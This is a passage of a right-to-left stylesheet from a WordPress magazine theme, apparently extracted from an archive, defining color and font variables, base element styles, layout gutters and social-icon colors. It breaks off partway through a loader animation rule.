U+F10A-F10B, U+F123, U+F13E, U+F148-F149, U+F14C, U+F156, U+F15E, U+F160-F161, U+F163, U+F175-F178, U+F195, U+F1F8, U+F219, U+F250, U+F252, U+F27A; } PK!rccassets/css/rtl.cssnu[/* ----------------- >>> TABLE OF CONTENTS: 1 - CSS Variables 2 - General 3 - Icon Fonts 4 - Swiper Slider 5 - Header 6 - Post Entry 7 - Post Modules 8 - Blocks 9 - Single 10 - Archives 11 - Pages 12 - Footer 13 - Responsive 14 - Print ----------------- */ /* ----------------- 1 - CSS Variables ----------------- */ :root { --body-fcolor: #282828; /** borders */ --round-5: 5px; --round-3: 3px; --round-7: 7px; /*--flex-*/ --flex-gray-7: #88888812; --flex-gray-15: #88888826; --flex-gray-20: #88888833; --flex-gray-40: #88888866; /** absolute color */ --absolute-white: #fff; --absolute-light: #ddd; --absolute-dark: #242424; --height-34: 34px; --height-40: 40px; --padding-40: 0 40px; --shadow-2: #00000005; --shadow-7: #00000012; --shadow-12: #0000001f; --rem-small: .92rem; --rem-mini: .8rem; --em-small: .92em; --em-mini: .8em; --timing: cubic-bezier(0.32, 0.74, 0.57, 1); --effect: all .25s cubic-bezier(0.32, 0.74, 0.57, 1); --el-spacing: 12px; --bottom-spacing: 35px; --box-spacing: 5%; --nav-height: 60px; --solid-white: #fff; --solid-light: #fafafa; --review-color: #ffc300; --video-color: #ffc300; --gallery-color: #729dff; --audio-color: #ffa052; --max-width-wo-sb: 100%; --g-color: #ff184e; --g-color-90: #ff184ee6; --dark-accent: #191c20; --dark-accent-90: #191c20f2; --dark-accent-0: #191c2000; /** header default */ --nav-bg: #fff; --nav-bg-from: #fff; --nav-bg-to: #fff; --nav-color: #282828; --nav-color-10: #28282820; --subnav-bg: #fff; --subnav-bg-from: #fff; --subnav-bg-to: #fff; --subnav-color: #282828; --subnav-color-10: #28282820; --transparent-nav-color: #fff; --swiper-navigation-size: 44px; --indicator-height: 4px; --indicator-bg-from: #ff0084; --indicator-bg-to: #2c2cf8; --privacy-color: #fff; --heading-color: var(--body-fcolor); --heading-sub-color: var(--g-color); --column-border-color: var(--flex-gray-20); --bottom-border-color: var(--flex-gray-20); /** fonts */ --body-family: 'Oxygen', sans-serif; --body-fsize: 16px; --body-fweight: 400; --body-fspace: normal; --body-transform: none; --body-fstyle: normal; --h1-family: 'Encode Sans Condensed', sans-serif; --h1-fsize: 40px; --h1-fweight: 700; --h1-fspace: normal; --h1-transform: none; --h1-fstyle: normal; --h1-fcolor: inherit; --h2-family: 'Encode Sans Condensed', sans-serif; --h2-fsize: 28px; --h2-fweight: 700; --h2-fspace: normal; --h2-transform: none; --h2-fstyle: normal; --h2-fcolor: inherit; --h3-family: 'Encode Sans Condensed', sans-serif; --h3-fsize: 22px; --h3-fweight: 700; --h3-fspace: normal; --h3-transform: none; --h3-fstyle: normal; --h3-fcolor: inherit; --h4-family: 'Encode Sans Condensed', sans-serif; --h4-fsize: 16px; --h4-fweight: 700; --h4-fspace: normal; --h4-transform: none; --h4-fstyle: normal; --h4-fcolor: inherit; --h5-family: 'Encode Sans Condensed', sans-serif; --h5-fsize: 14px; --h5-fweight: 700; --h5-fspace: normal; --h5-transform: none; --h5-fstyle: normal; --h5-fcolor: inherit; --h6-family: 'Encode Sans Condensed', sans-serif; --h6-fsize: 13px; --h6-fweight: 600; --h6-fspace: normal; --h6-transform: none; --h6-fstyle: normal; --h6-fcolor: inherit; --tagline-family: 'Encode Sans Condensed', sans-serif; --tagline-fsize: 28px; --tagline-fweight: 400; --tagline-fspace: normal; --tagline-transform: none; --tagline-fstyle: normal; --tagline-fcolor: inherit; --cat-family: 'Oxygen', sans-serif; --cat-fsize: 10px; --cat-fweight: 700; --cat-fspace: .07em; --cat-transform: uppercase; --cat-fstyle: normal; --meta-family: 'Encode Sans Condensed', sans-serif; --meta-fsize: 13px; --meta-fweight: 400; --meta-fspace: normal; --meta-transform: none; --meta-fstyle: normal; --meta-fcolor: #666; --meta-b-family: inherit; --meta-b-fweight: 600; --meta-b-fspace: normal; --meta-b-transform: none; --meta-b-fstyle: normal; --meta-b-fcolor: #282828; --input-family: 'Encode Sans Condensed', sans-serif; --input-fsize: 14px; --input-fweight: 400; --input-fspace: normal; --input-transform: none; --input-fstyle: normal; --input-fcolor: inherit; --btn-family: 'Encode Sans Condensed', sans-serif; --btn-fsize: 12px; --btn-fweight: 700; --btn-fspace: normal; --btn-transform: none; --btn-fstyle: normal; --btn-fcolor: inherit; --menu-family: 'Encode Sans Condensed', sans-serif; --menu-fsize: 17px; --menu-fweight: 600; --menu-fspace: -.02em; --menu-transform: none; --menu-fstyle: normal; --submenu-family: 'Encode Sans Condensed', sans-serif; --submenu-fsize: 13px; --submenu-fweight: 500; --submenu-fspace: -.02em; --submenu-transform: none; --submenu-fstyle: normal; --dwidgets-family: 'Oxygen', sans-serif; --dwidgets-fsize: 13px; --dwidgets-fweight: 600; --dwidgets-fspace: 0; --dwidgets-fstyle: normal; --dwidgets-transform: none; --excerpt-color: #666; --headline-fsize: 45px; --tagline-s-fsize: 22px; --excerpt-fsize: 14px; } [data-theme='dark'], .light-scheme { --flex-gray-7: #88888818; --flex-gray-15: #88888840; --flex-gray-20: #8888884d; /** darker on dark */ --shadow-2: #00000033; --shadow-7: #0000004d; --shadow-12: #00000066; /** color */ --body-fcolor: #fff; --h1-fcolor: #fff; --h2-fcolor: #fff; --h3-fcolor: #fff; --h4-fcolor: #fff; --h5-fcolor: #fff; --h6-fcolor: #fff; --headline-fcolor: #fff; --tagline-fcolor: #fff; --input-fcolor: #fff; --bcrumb-color: #fff; --excerpt-color: #ddd; --meta-fcolor: #bbb; --meta-b-fcolor: #fff; --solid-white: #191c20; --solid-light: #333; /** header default */ --nav-bg: #131518; --nav-bg-from: #131518; --nav-bg-to: #131518; --nav-color: #fff; --nav-color-10: #ffffff15; --subnav-bg: #191c20; --subnav-bg-from: #191c20; --subnav-bg-to: #191c20; --subnav-color: #fff; --subnav-color-10: #ffffff15; --heading-color: var(--body-fcolor); --heading-sub-color: var(--g-color); --dark-accent: #0e0f12; --dark-accent-90: #0e0f12f2; --dark-accent-0: #0e0f1200; } body:not([data-theme='dark']) [data-mode='dark'], body[data-theme='dark'] [data-mode='default'], body .light-scheme [data-mode='default'] { display: none !important; } body .light-scheme [data-mode='dark'] { display: inherit !important; } [data-theme='dark'] .icon-svg, .light-scheme .icon-svg { filter: invert(100%); -webkit-filter: invert(100%); } .dark-opacity[data-theme='dark'] .p-featured { background-color: #000; } .dark-opacity[data-theme='dark'] .wp-post-image { opacity: .7; } [data-theme='dark'] input::placeholder, .light-scheme input::placeholder { color: var(--absolute-light); } .global-color { color: var(--g-color); } /* ----------------- 2 - General ----------------- */ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, blockquote, p, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, font, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td { font-family: inherit; font-size: 100%; font-weight: inherit; font-style: inherit; line-height: inherit; margin: 0; padding: 0; vertical-align: baseline; border: 0; outline: 0; } html { font-size: var(--body-fsize); overflow-x: hidden; text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; } body { font-family: var(--body-family); font-size: var(--body-fsize); font-weight: var(--body-fweight); font-style: var(--body-fstyle); line-height: 1.7; display: block; margin: 0; letter-spacing: var(--body-fspace); text-transform: var(--body-transform); color: var(--body-fcolor); background-color: var(--solid-white); } body.rtl { direction: rtl; } * { -moz-box-sizing: border-box; -webkit-box-sizing: border-box; box-sizing: border-box; } :before, :after { -moz-box-sizing: border-box; -webkit-box-sizing: border-box; box-sizing: border-box } .site { position: relative; display: block; } .site * { text-rendering: optimizeLegibility; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .site-outer { position: relative; display: block; max-width: 100%; background-color: var(--solid-white); } .top-spacing .site-outer { -webkit-transition: margin .5s var(--timing); transition: margin .5s var(--timing); } .site-wrap, .site-content { position: relative; z-index: 0; display: block; margin: 0; padding: 0; } .site-wrap { min-height: 45vh; } button, hr, input { overflow: visible } audio, canvas, progress, video { display: inline-block } progress, sub, sup { vertical-align: baseline } [type=checkbox], [type=radio], legend { box-sizing: border-box; padding: 0 } acronym { cursor: help } .rbct mark, .rbct ins { text-decoration: none; background-color: rgba(0, 0, 0, .07); } figure { display: block; margin: 0; } cite, em { font-weight: normal; font-style: italic; } hr { box-sizing: content-box; height: 0 } u { text-decoration: underline; } dt { font-weight: 700; } dd { margin-inline-start: 40px; } address { font-style: italic; } code, kbd, pre, samp, var { font-family: monospace, monospace; font-size: .9em; } a { text-decoration: none; color: inherit; background-color: transparent; } abbr[title] { cursor: default; text-decoration: none; } b, strong { font-weight: 700; } dfn { font-style: italic } mark { color: #000; background-color: #ff0; } code { font-family: Courier, monospace; background-color: var(--flex-gray-7); } small { font-size: 80% } sub, sup { font-size: 75%; line-height: 0; position: relative; } sub { bottom: -.25em } sup { top: -.5em } audio:not([controls]) { display: none; height: 0 } img { max-width: 100%; height: auto; vertical-align: middle; border-style: none; object-fit: cover; -webkit-object-fit: cover; } svg:not(:root) { overflow: hidden } button, input, optgroup, select, textarea { text-transform: none; color: inherit; outline: none !important; } .bypostauthor { position: relative; } .screen-reader-text, .screen-reader-text span, .ui-helper-hidden-accessible { position: absolute; overflow: hidden; clip: rect(1px, 1px, 1px, 1px); width: 1px; height: 1px; margin: -1px; padding: 0; word-wrap: normal !important; border: 0; -webkitcolorip-path: inset(50%); clip-path: inset(50%); } select { line-height: 22px; position: relative; max-width: 100%; padding: 10px; border-color: var(--flex-gray-15); border-radius: var(--round-5); outline: none !important; background: transparent url('data:image/svg+xml;utf8,') no-repeat left 5px top 50%; background-size: 22px; -moz-appearance: none; -webkit-appearance: none; appearance: none; } select option { background-color: var(--solid-white); } [type=reset], [type=submit], button, html [type=button] { -webkit-appearance: button; } [type=button]::-moz-focus-inner, [type=reset]::-moz-focus-inner, [type=submit]::-moz-focus-inner, button::-moz-focus-inner { padding: 0; border-style: none; } [type=button]:-moz-focusring, [type=reset]:-moz-focusring, [type=submit]:-moz-focusring, button:-moz-focusring { outline: ButtonText dotted 1px; } :-webkit-autofill { -webkit-box-shadow: 0 0 0 30px #fafafa inset; } fieldset { padding: 0; } legend { font-weight: 700; display: table; max-width: 100%; white-space: normal; color: inherit; } textarea { overflow: auto; } [type='number']::-webkit-inner-spin-button, [type='number']::-webkit-outer-spin-button { height: auto; } [type='search']::-webkit-search-cancel-button, [type='search']::-webkit-search-decoration { -webkit-appearance: none } ::-webkit-file-upload-button { font: inherit; -webkit-appearance: button } summary { display: list-item } [hidden], template { display: none } del { text-decoration: line-through; } big { font-size: 125%; } .clearfix:before, .clearfix:after { display: table; clear: both; content: ' '; } .rb-error { font-size: var(--rem-mini); } .hidden { display: none; } h1, .h1 { font-family: var(--h1-family); font-size: var(--h1-fsize); font-weight: var(--h1-fweight); font-style: var(--h1-fstyle); line-height: var(--h1-fheight, 1.2); letter-spacing: var(--h1-fspace); text-transform: var(--h1-transform); } h1 { color: var(--h1-fcolor); } h2, .h2 { font-family: var(--h2-family); font-size: var(--h2-fsize); font-weight: var(--h2-fweight); font-style: var(--h2-fstyle); line-height: var(--h2-fheight, 1.25); letter-spacing: var(--h2-fspace); text-transform: var(--h2-transform); } h2 { color: var(--h2-fcolor); } h3, .h3 { font-family: var(--h3-family); font-size: var(--h3-fsize); font-weight: var(--h3-fweight); font-style: var(--h3-fstyle); line-height: var(--h3-fheight, 1.3); letter-spacing: var(--h3-fspace); text-transform: var(--h3-transform); } h3 { color: var(--h3-fcolor); } h4, .h4 { font-family: var(--h4-family); font-size: var(--h4-fsize); font-weight: var(--h4-fweight); font-style: var(--h4-fstyle); line-height: var(--h4-fheight, 1.45); letter-spacing: var(--h4-fspace); text-transform: var(--h4-transform); } h4 { color: var(--h4-fcolor); } .h5, h5 { font-family: var(--h5-family); font-size: var(--h5-fsize); font-weight: var(--h5-fweight); font-style: var(--h5-fstyle); line-height: var(--h5-fheight, 1.5); letter-spacing: var(--h5-fspace); text-transform: var(--h5-transform); } h5 { color: var(--h5-fcolor); } h6, .h6 { font-family: var(--h6-family); font-size: var(--h6-fsize); font-weight: var(--h6-fweight); font-style: var(--h6-fstyle); line-height: var(--h6-fheight, 1.5); letter-spacing: var(--h6-fspace); text-transform: var(--h6-transform); } h6 { color: var(--h6-fcolor); } .p-categories { font-family: var(--cat-family); font-size: var(--cat-fsize); font-weight: var(--cat-fweight); font-style: var(--cat-fstyle); letter-spacing: var(--cat-fspace); text-transform: var(--cat-transform); } .is-meta, .meta-text, .user-form label, .rss-date, .widget_rss cite, .woocommerce-result-count, .woocommerce-ordering select { font-family: var(--meta-family); font-size: var(--meta-fsize); font-weight: var(--meta-fweight); font-style: var(--meta-fstyle); letter-spacing: var(--meta-fspace); text-transform: var(--meta-transform); } .meta-label, .tipsy-inner, .product_meta { font-family: var(--meta-family); font-weight: var(--meta-fweight); font-style: var(--meta-fstyle); letter-spacing: var(--meta-fspace); text-transform: var(--meta-transform); color: var(--meta-fcolor); } figcaption, .wp-caption-text { font-family: var(--meta-family); font-size: var(--meta-fsize); font-weight: var(--meta-fweight); font-style: var(--meta-fstyle); letter-spacing: var(--meta-fspace); text-transform: var(--meta-transform); } .is-meta { color: var(--meta-fcolor); } .meta-author, .meta-bold { font-family: var(--meta-b-family); font-size: inherit; font-weight: var(--meta-b-fweight); font-style: var(--meta-b-fstyle); letter-spacing: var(--meta-b-fspace); text-transform: var(--meta-b-transform); } .meta-author *:not(em), .meta-bold { color: var(--meta-b-fcolor, var(--body-fcolor)); } .p-readmore { font-family: var(--btn-family); font-size: var(--readmore-fsize, 12px); font-weight: 600; font-style: normal; text-transform: none; } input[type='text'], input[type='tel'], input[type='password'], input[type='email'], input[type='url'], input[type='search'], input[type='number'], textarea { font-family: var(--input-family); font-size: var(--input-fsize); font-weight: var(--input-fweight); font-style: var(--input-fstyle); line-height: 1.5; letter-spacing: var(--input-fspace); text-transform: var(--input-transform); color: var(--input-fcolor); } textarea { font-size: var(--input-fsize) !important; } input[type='submit'], button, .button, .is-btn, a.show-post-comment, a.comment-reply-link, .pagination-wrap, .rbbsl a > span, .widget_block .wp-block-search [type='submit'] { font-family: var(--btn-family); font-size: var(--btn-fsize); font-weight: var(--btn-fweight); font-style: var(--btn-fstyle); letter-spacing: var(--btn-fspace); text-transform: var(--btn-transform); } .comment-list .comment-reply-title small a { font-family: var(--btn-family); font-weight: var(--btn-fweight); font-style: var(--btn-fstyle); letter-spacing: var(--btn-fspace); text-transform: var(--btn-transform); } .breadcrumb-inner, .woocommerce-breadcrumb { font-family: 'Encode Sans Condensed', sans-serif; font-size: var(--bcrumb-fsize, 13px); font-weight: 600; font-style: normal; line-height: 1.5; color: var(--bcrumb-color, inherit); } .main-menu > li > a, .more-col .widget-heading, .elementor-widget-wp-widget-nav_menu h5, .woocommerce-MyAccount-navigation { font-family: var(--menu-family); font-size: var(--menu-fsize); font-weight: var(--menu-fweight); font-style: var(--menu-fstyle); line-height: 1.5; letter-spacing: var(--menu-fspace); text-transform: var(--menu-transform); } .main-menu .sub-menu > .menu-item a, .user-dropdown a, .more-col .menu a, .collapse-footer-menu a, .elementor-widget-container .menu a { font-family: var(--submenu-family); font-size: var(--submenu-fsize); font-weight: var(--submenu-fweight); font-style: var(--submenu-fstyle); line-height: 1.25; letter-spacing: var(--submenu-fspace); text-transform: var(--submenu-transform); color: var(--subnav-color); } .mobile-menu > li > a { font-family: 'Encode Sans Condensed', sans-serif; font-size: 1.1rem; font-weight: 400; font-style: normal; line-height: 1.5; letter-spacing: -.02em; text-transform: none; } .mobile-menu .sub-menu a { font-family: 'Encode Sans Condensed', sans-serif; font-size: 14px; font-weight: 700; font-style: normal; line-height: 1.5; text-transform: none; } .mobile-qview a { font-family: 'Encode Sans Condensed', sans-serif; font-size: 16px; font-weight: 600; font-style: normal; letter-spacing: -0.02em; text-transform: none; } .s-title { font-family: var(--headline-family, var(--h1-family)); font-size: var(--headline-fsize, var(--h1-fsize)); font-weight: var(--headline-fweight, var(--h1-fweight)); font-style: var(--headline-fstyle, var(--h1-fstyle)); letter-spacing: var(--headline-fspace, var(--h1-fspace)); text-transform: var(--headline-transform, var(--h1-transform)); color: var(--headline-fcolor, var(--h1-fcolor)); } .s-tagline { font-family: var(--tagline-family); font-size: var(--tagline-fsize); font-weight: var(--tagline-fweight); font-style: var(--tagline-fstyle); line-height: var(--tagline-fheight, 1.4); letter-spacing: var(--tagline-fspace); text-transform: var(--tagline-transform); color: var(--tagline-fcolor, inherit); } .s-title:not(.fw-headline) { font-size: var(--headline-s-fsize, var(--h1-fsize)); } .s-tagline:not(.fw-tagline) { font-size: var(--tagline-s-fsize); } .heading-title > * { font-family: var(--heading-family, inherit); font-size: var(--heading-fsize, inherit); font-weight: var(--heading-fweight, inherit); font-style: var(--heading-fstyle, inherit); letter-spacing: var(--heading-fspace, inherit); text-transform: var(--heading-transform, inherit); } .heading-tagline > * { font-family: var(--subheading-family, inherit); font-size: var(--subheading-fsize, inherit); font-weight: var(--subheading-fweight, inherit); font-style: var(--subhading-fstyle, inherit); letter-spacing: var(--subheading-fspace, inherit); text-transform: var(--subheading-transform, inherit); } .description-text { font-size: var(--excerpt-fsize); } .p-wrap .entry-summary { font-size: var(--excerpt-fsize); color: var(--excerpt-color); } input[type='text'], input[type='tel'], input[type='password'], input[type='email'], input[type='url'], input[type='search'], input[type='number'] { line-height: 22px; max-width: 100%; padding: 10px 20px; -webkit-transition: var(--effect); transition: var(--effect); white-space: nowrap; border: none; border-radius: var(--round-3); outline: none !important; background-color: var(--flex-gray-7); -webkit-box-shadow: none !important; box-shadow: none !important; } input[type='submit']:not(.search-submit), button, .is-btn, .button { line-height: var(--height-40); padding: var(--padding-40); cursor: pointer; -webkit-transition: var(--effect); transition: var(--effect); white-space: nowrap; color: var(--absolute-white); border: none; -webkit-border-radius: var(--round-3); border-radius: var(--round-3); outline: none !important; background: var(--g-color); -webkit-box-shadow: none; box-shadow: none; } input[type='submit']:not(.search-submit):hover, button:hover, .is-btn:hover { -webkit-box-shadow: 0 4px 15px var(--g-color-90); box-shadow: 0 4px 15px var(--g-color-90); } textarea { display: block; width: 100%; max-width: 100%; padding: 10px 25px; -webkit-transition: var(--effect); transition: var(--effect); border: none; border-radius: var(--round-3); outline: none; background-color: var(--flex-gray-7); -webkit-box-shadow: none !important; box-shadow: none !important; } .rb-container, .rb-wide-container, .rb-small-container { position: static; display: block; width: 100%; max-width: 1280px; margin-right: auto; margin-left: auto; } .rb-wide-container { max-width: 1500px; } .rb-small-container { max-width: 860px; } .gutter-n20 { margin-right: -20px; margin-left: -20px; } .gutter-n15 { margin-right: -15px; margin-left: -15px; } .gutter-m20 { margin-right: 20px; margin-left: 20px; } .gutter-p20 { padding-right: 20px; padding-left: 20px; } .gutter-p15 { padding-right: 15px; padding-left: 15px; } .gutter-p10 { padding-right: 10px; padding-left: 10px; } .edge-padding { padding-right: 20px; padding-left: 20px; } .rb-section ul, .rb-section ol { list-style: none; } h1, h2, h3, h4, h5, h6, .h1, .h2, .h3, .h4, .h5, .h6 { -ms-word-wrap: break-word; word-wrap: break-word; } .icon-holder { display: flex; align-items: center; } .svg-icon { width: 1.5em; height: auto; } .overlay-text .meta-inner, .overlay-text .meta-text, .overlay-text .is-meta, .overlay-text .meta-label { color: var(--absolute-light); } .overlay-text .entry-title, .overlay-text .counter-el, .overlay-text .s-title, .overlay-text .s-title.fw-headline, .overlay-text .rb-icon, .overlay-text .meta-author *:not(em), .overlay-text .meta-bold, .overlay-text .rb-bookmark, .overlay-text .caption-text, .overlay-text .rbi-bookmark, .overlay-text .t-shared-sec .share-action, .overlay-text .breadcrumb-inner, .overlay-text .sponsor-icon, .overlay-text .p-link, [data-theme='dark'] .t-shared-sec .share-action, [data-theme='dark'] .sticky-share-list .share-action, .white-text * { color: var(--absolute-white); } .overlay-text .entry-summary, .overlay-text .s-tagline, .overlay-text .s-tagline.fw-tagline { color: #f2f2f2; } .light-scheme { color: var(--body-fcolor); } input:-webkit-autofill, input:-webkit-autofill:hover, input:-webkit-autofill:focus, input:-webkit-autofill:active { transition: background-color 999999s ease-in-out 0s; } .holder-wrap { position: relative; } .overlay-wrap { position: absolute; z-index: 10; top: 0; right: 0; bottom: 0; left: 0; display: flex; align-items: flex-end; flex-flow: row nowrap; pointer-events: none; } .overlay-inner { position: relative; display: block; width: 100%; padding: 20px; cursor: auto; pointer-events: auto; } .overlay-inner .counter-el { padding: 20px; } .p-gradient { background: -webkit-gradient(linear, right top, right bottom, from(var(--dark-accent-0)), to(var(--dark-accent))); background: linear-gradient(to top, var(--dark-accent) 0, var(--dark-accent-90) 50%, var(--dark-accent-0) 100%); } .p-vtop .p-gradient { background: -webkit-gradient(linear, right bottom, right top, from(var(--dark-accent-0)), to(var(--dark-accent))); background: linear-gradient(to bottom, var(--dark-accent) 0, var(--dark-accent-90) 50%, var(--dark-accent-0) 100%); } .p-highlight .p-gradient { background-color: var(--dark-accent); } .rb-columns > .block-inner { display: flex; flex-flow: row wrap; flex-basis: 100%; flex-grow: 1; } .is-gap-5 .block-inner { margin-right: -5px; margin-left: -5px; --column-gap: 5px; } .is-gap-7 .block-inner { margin-right: -7px; margin-left: -7px; --column-gap: 7px; } .is-gap-10 .block-inner { margin-right: -10px; margin-left: -10px; --column-gap: 10px; } .is-gap-15 .block-inner { margin-right: -15px; margin-left: -15px; --column-gap: 15px; } .is-gap-20 .block-inner { margin-right: -20px; margin-left: -20px; --column-gap: 20px; } .is-gap-25 .block-inner { margin-right: -25px; margin-left: -25px; --column-gap: 25px; } .is-gap-30 .block-inner { margin-right: -30px; margin-left: -30px; --column-gap: 30px; } .is-gap-35 .block-inner { margin-right: -35px; margin-left: -35px; --column-gap: 35px; } .rb-columns > .block-inner > * { flex-basis: 100%; width: 100%; padding-right: var(--column-gap, 0); padding-left: var(--column-gap, 0); } [class*='is-gap-'] > .block-inner > * { padding-right: var(--column-gap, 0); padding-left: var(--column-gap, 0); } .is-color .icon-facebook { color: #89abfc; } .is-color .icon-facebook:hover { color: #1f82ec; text-shadow: 0 5px 15px #1f82ec; } .is-bg .icon-facebook { background-color: #89abfc; } .is-bg .icon-facebook:hover { background-color: #1f82ec; box-shadow: 0 5px 15px #1f82ec; } .is-color .icon-twitter { color: #60d2f5; } .is-color .icon-twitter:hover { color: #13b9ee; text-shadow: 0 5px 15px #13b9ee; } .is-bg .icon-twitter { background-color: #60d2f5; } .is-bg .icon-twitter:hover { background-color: #13b9ee; box-shadow: 0 5px 15px #13b9ee; } .is-color .icon-pinterest { color: #f74c53; } .is-color .icon-pinterest:hover { color: #f60c19; text-shadow: 0 5px 15px #f60c19; } .is-bg .icon-pinterest { background-color: #f74c53; } .is-bg .icon-pinterest:hover { background-color: #f60c19; box-shadow: 0 5px 15px #f60c19; } .is-color .icon-instagram { color: #7e40b6; } .is-color .icon-instagram:hover { color: #8823b6; text-shadow: 0 5px 15px #8823b6; } .is-bg .icon-instagram { background-color: #7e40b6; } .is-bg .icon-instagram:hover { background-color: #8823b6; box-shadow: 0 5px 15px #8823b6; } .is-color .icon-linkedin { color: #007bb6; } .is-color .icon-linkedin:hover { color: #006ab1; text-shadow: 0 5px 15px #006ab1; } .is-bg .icon-linkedin { background-color: #007bb6; } .is-bg .icon-linkedin:hover { background-color: #006ab1; box-shadow: 0 5px 15px #006ab1; } .is-color .icon-tumblr { color: #32506d; } .is-color .icon-tumblr:hover { color: #1f3143; text-shadow: 0 5px 15px #1f3143; } .is-bg .icon-tumblr { background-color: #32506d; } .is-bg .icon-tumblr:hover { background-color: #1f3143; box-shadow: 0 5px 15px #1f3143; } .is-color .icon-flickr { color: #ff0082; } .is-color .icon-flickr:hover { color: #ff015a; text-shadow: 0 5px 15px #ff015a; } .is-bg .icon-flickr { background-color: #ff0082; } .is-bg .icon-flickr:hover { background-color: #ff015a; box-shadow: 0 5px 15px #ff015a; } .is-color .icon-skype { color: #00aae1; } .is-color .icon-skype:hover { color: #0070bf; text-shadow: 0 5px 15px #0070bf; } .is-bg .icon-skype { background-color: #00aae1; } .is-bg .icon-skype:hover { background-color: #0070bf; box-shadow: 0 5px 15px #0070bf; } .is-color .icon-snapchat { color: #ffc94f; } .is-color .icon-snapchat:hover { color: #e3c100; text-shadow: 0 5px 15px #e3c100; } .is-bg .icon-snapchat { background-color: #ffc94f; } .is-bg .icon-snapchat:hover { background-color: #e3c100; box-shadow: 0 5px 15px #e3c100; } .is-color .icon-myspace { color: #030303; } .is-color .icon-myspace:hover { color: #000; text-shadow: 0 5px 15px #000; } .is-bg .icon-myspace { background-color: #030303; } .is-bg .icon-myspace:hover { background-color: #000; box-shadow: 0 5px 15px #000; } .is-color .icon-youtube { color: #ef464b; } .is-color .icon-youtube:hover { color: #fc161e; text-shadow: 0 5px 15px #fc161e; } .is-bg .icon-youtube { background-color: #ef464b; } .is-bg .icon-youtube:hover { background-color: #fc161e; box-shadow: 0 5px 15px #fc161e; } .is-color .icon-bloglovin { color: #111; } .is-color .icon-bloglovin:hover { color: #000; text-shadow: 0 5px 15px #000; } .is-bg .icon-bloglovin { background-color: #111; } .is-bg .icon-bloglovin:hover { background-color: #000; box-shadow: 0 5px 15px #000; } .is-color .icon-digg { color: #191919; } .is-color .icon-digg:hover { color: #000; } .is-bg .icon-digg { background-color: #191919; } .is-color .icon-digg:hover { color: #000; text-shadow: 0 5px 15px #000; } .is-color .icon-dribbble { color: #fb70a6; } .is-color .icon-dribbble:hover { color: #ff407f; text-shadow: 0 5px 15px #ff407f; } .is-bg .icon-dribbble { background-color: #fb70a6; } .is-bg .icon-dribbble:hover { background-color: #ff407f; box-shadow: 0 5px 15px #ff407f; } .is-color .icon-soundcloud { color: #fd794a; } .is-color .icon-soundcloud:hover { color: #ff5313; text-shadow: 0 5px 15px #ff5313; } .is-bg .icon-soundcloud { background-color: #fd794a; } .is-bg .icon-soundcloud:hover { background-color: #ff5313; box-shadow: 0 5px 15px #ff5313; } .is-color .icon-vk { color: #5fa0dd; } .is-color .icon-vk:hover { color: #005f8c; } .is-bg .icon-vk { background-color: #5fa0dd; } .is-bg .icon-vk:hover { background-color: #005f8c; box-shadow: 0 5px 15px #005f8c; } .is-color .icon-whatsapp { color: #00e676; } .is-color .icon-whatsapp:hover { color: #00e537; text-shadow: 0 5px 15px #00e537; } .is-bg .icon-whatsapp { background-color: #00e676; } .is-bg .icon-whatsapp:hover { background-color: #00e537; box-shadow: 0 5px 15px #00e537; } .is-color .icon-vimeo { color: #44bbe1; } .is-color .icon-vimeo:hover { color: #16b1e3; text-shadow: 0 5px 15px #16b1e3; } .is-bg .icon-vimeo { background-color: #44bbe1; } .is-bg .icon-vimeo:hover { background-color: #16b1e3; box-shadow: 0 5px 15px #16b1e3; } .is-color .icon-telegram { color: #649fdf; } .is-color .icon-telegram:hover { color: #3885d9; text-shadow: 0 5px 15px #3885d9; } .is-bg .icon-telegram { background-color: #649fdf; } .is-bg .icon-telegram:hover { background-color: #3885d9; box-shadow: 0 5px 15px #3885d9; } .is-color .icon-rss { color: #ffd43f; } .is-color .icon-rss:hover { color: #eab910; text-shadow: 0 5px 15px #eab910; } .is-bg .icon-rss { background-color: #ffd43f; } .is-bg .icon-rss:hover { background-color: #eab910; box-shadow: 0 5px 15px #eab910; } .is-color .icon-reddit { color: #ff4500; } .is-color .icon-reddit:hover { color: #e02200; text-shadow: 0 5px 15px #e02200; } .is-bg .icon-reddit { background-color: #ff4500; } .is-bg .icon-reddit:hover { background-color: #e02200; box-shadow: 0 5px 15px #e02200; } .is-color .icon-email { color: #efab68; } .is-color .icon-email:hover { color: #ff9c38; text-shadow: 0 5px 15px #ff9c38; } .is-bg .icon-email { background-color: #efab68; } .is-bg .icon-email:hover { background-color: #ff9c38; box-shadow: 0 5px 15px #ff9c38; } .is-color .icon-copy { color: #66bbbf; } .is-color .icon-copy:hover { color: #38787a; } .is-color .icon-print { color: #4082f1; } .is-color .icon-print:hover { color: #0f67f6; text-shadow: 0 5px 15px #0f67f6; } .is-bg .icon-copy { background-color: #66bbbf; } .is-bg .icon-copy:hover { background-color: #38787a; box-shadow: 0 5px 15px #38787a; } .is-bg .icon-print { background-color: #4082f1; } .is-bg .icon-print:hover { background-color: #0f67f6; box-shadow: 0 5px 15px #0f67f6; } .is-color .icon-custom { color: var(--dark-accent); } .effect-fadeout.activated a { opacity: .3; } .effect-fadeout.activated a:hover, .effect-fadeout.activated a:focus { opacity: 1; } .t-shared-sec .share-action:hover, .l-shared-sec .share-action:hover, .footer-social-list a:hover { -webkit-transform: scale(1.2); transform: scale(1.2); } .is-bg { color: var(--absolute-white); } .is-bg * { color: inherit; } .is-hidden { display: none !important; } .is-invisible { visibility: hidden; opacity: 0; } .rb-loader { font-size: 10px; position: relative; display: none; overflow: hidden; width: 3em; height: 3em; transform: translateZ(0); animation: spin-loader .8s infinite linear; text-indent: -9999em; color: var(--g-color); border-radius: 50%; background: currentColor; background: linear-gradient(to left, currentColor 10%, rgba(255, 255, 255, 0) 50%); } .rb-loader:before { position: absolute; top: 0; right: 0; width: 50%; height: 50%; content: ''; color: inherit; border-radius: 0 100% 0 0; background: currentColor; } .rb-loader:after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; width: 75%; height: 75%; margin: auto; content: ''; opacity: 0.5; border-radius: 50%; background: var(--solid-white); } @-webkit-keyframes spin-loader { 0% { transform: rotate(0deg); } 100% { transform: rotate(-360deg); } } @keyframes spin-loader { 0% { transform: 